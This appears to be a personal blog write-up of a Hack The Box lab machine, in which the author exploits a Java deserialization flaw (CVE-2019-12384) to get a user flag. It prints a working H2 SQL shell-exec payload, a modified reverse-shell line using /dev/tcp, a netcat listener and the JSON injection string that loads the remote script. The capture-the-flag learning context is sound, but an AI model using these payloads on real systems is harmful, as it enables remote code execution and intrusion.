Hackthebox Notes Java Deserialization Part 2
3 minute read
Last night, I left off at…
not sure if any specific CVE found has a specific exploit or PoC for this box, or if I'll have to research and roll my own
appears that Java Deserialization is the hot topic and I am unsure if this is like SQLi where I just need to know how it works and experiment with it
been reading for an hour about java deserialization to get a basic understanding of it
found resource https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
pause for the night to spend time with wife
This morning, I made my wife and myself some coffee, the kids are out of the house, and I launched back into the machine with a few hours still remaining.
reading though OWASP guide, found a deserialization cheat sheet and mention of burpsuite deserialization plugin
loaded burp, went to BApp, found Java Deserialization extension, requires Burpsuite Pro, scratch that
sent request through proxy...nothing unusual
reading more about deserialization
found CVE-2019-12384 exploit on github, reviewing code
looks like i can modify the exploit and go from there
cloning exploit repository...done
reviewing code...
contains inject.sql with a payload inside:
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('id > exploited.txt')
so I modified last line from:
CALL SHELLEXEC('id > exploited.txt')
to:
CALL SHELLEXEC('setsid bash -i &>/dev/tcp/IP/PORT 0>&1 &')
in order to catch a shell in netcat.
so now according to the exploit, i spawn an http server to host the exploit
python2 -m SimpleHTTPServer
created a netcat listener
nc -nlvp 4444
pasted the following into http input form:
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://IP:PORT/inject.sql'"}]
Immediately got a shell!
whoami = pericles
ps aux = crontab, apache servers, and more
pulled user flag real quick and submitted
googling for manual enumeration cheat sheets
heading out to a meeting, killed shell and HTB VPN
I feedback.
Let me know what you think of this article on twitter @cpardue09 or leave a comment below!
Let me know what you think of this article on twitter @cpardue09 or leave a comment below!
comments powered by Disqus